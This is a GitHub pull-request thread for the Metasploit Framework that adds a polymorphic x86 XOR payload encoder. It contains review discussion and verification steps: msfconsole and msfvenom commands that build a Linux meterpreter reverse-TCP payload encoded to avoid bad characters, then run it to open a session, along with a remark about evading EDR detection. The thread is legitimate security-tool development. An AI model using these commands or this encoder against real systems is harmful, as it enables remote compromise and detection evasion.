-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add encoder module x86/xor_poly at path modules/encoder/x86/xor_poly.rb, Rubocop clean, msftidy clean #17401
Conversation
…p clean, msftidy clean, No documentation written
Remove outdated comments
…isters, change name to xor_poly.rb
…l regs to preserve them
…l regs to preserve them
Updated PR description to make things easier to read. |
This is neat stuff, thank you. Any chance of an x64 version for parity (and utility, not a lot of x86 targets around anymore and WOW64 tends to "count toward badness score" by EDR from what i've seen)? 😄 |
Hey @sempervictus i'm really glad you appreciate it ! |
After some testing, the same code cannot be used for x64, since it need a little bit of tweaking with instructions size and the register permutations. |
@araout42 - thank you sir, encoders are long-lived tools in the satchel so the more working ones we have, the merrier. |
Hi there, @araout42; this looks great. In your verification steps, you invoke this with
Please let me know if I'm missing something? |
First, You are right, i did change the name from The second is that it cannot find a proper permutation without badchar
the error message is given by the encoder and says that no permutation has been found with this badchar set so it is working properly But I can implement another polymorphism routine to be able to handle these badchars aswell ^^ As of now i also changed my first message using only the opcodes |
Sweet; thanks, @araout42. I appreciate the quick answer! If I can't get it to work in the example and default setting, I usually assume there's a setup step or something else that I've missed. In this case, given the changing feature set, it makes sense the old example |
No problem and thank you Well i'd be happy to implement this minor change you'v mentionned earlyer :) |
It was a minor thing I noticed, but I wanted to get everything working and do a deeper dive to make sure that there was nothing else I saw. I don't want to keep asking you to change things, so I'll try and get all the requested changes to you all at once. We appreciate your time and don't want to waste it! |
Creating payload
Getting callback
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
So it turns out the minor thing I was going to have you fix was actually right, and I just misread it. Another reason to make sure I get it working before I suggest a fix 😆.
The only thing I see is this minor typo.
Thank you, well it seems perfect |
I would definitely leave the comments, especially with something this complex. |
Co-authored-by: Brendan <bwatters@rapid7.com>
…framework into New_x86_xor_encoder
Well I've reread everything, and made slight changes with the comments. |
db298be
to
75002f1
Compare
Create payload
Collect Shell:
|
Release NotesThis PR adds a new x86 XOR polymorphic encoder. |
Add encoder module
x86/xor_poly
at pathmodules/encoder/x86/xor_poly.rb
, Rubocop clean, msftidy cleanit has 100% polymorphism, all the bytes changes from a generation to another
probably should be ranked as excellent since it has many many permutations for badchars
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set payload linux/x86/meterpreter/reverse_tcp
exploit
expected : Started listener ..../msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.01 LPORT=4444 -f elf -e x86/xor_poly -b "\x00\x90" > /tmp/Test && chmod +x /tmp/Test
/tmp/test
expected Connect to listener and give meterpreter session as in the video2022-12-20.16-13-46.mov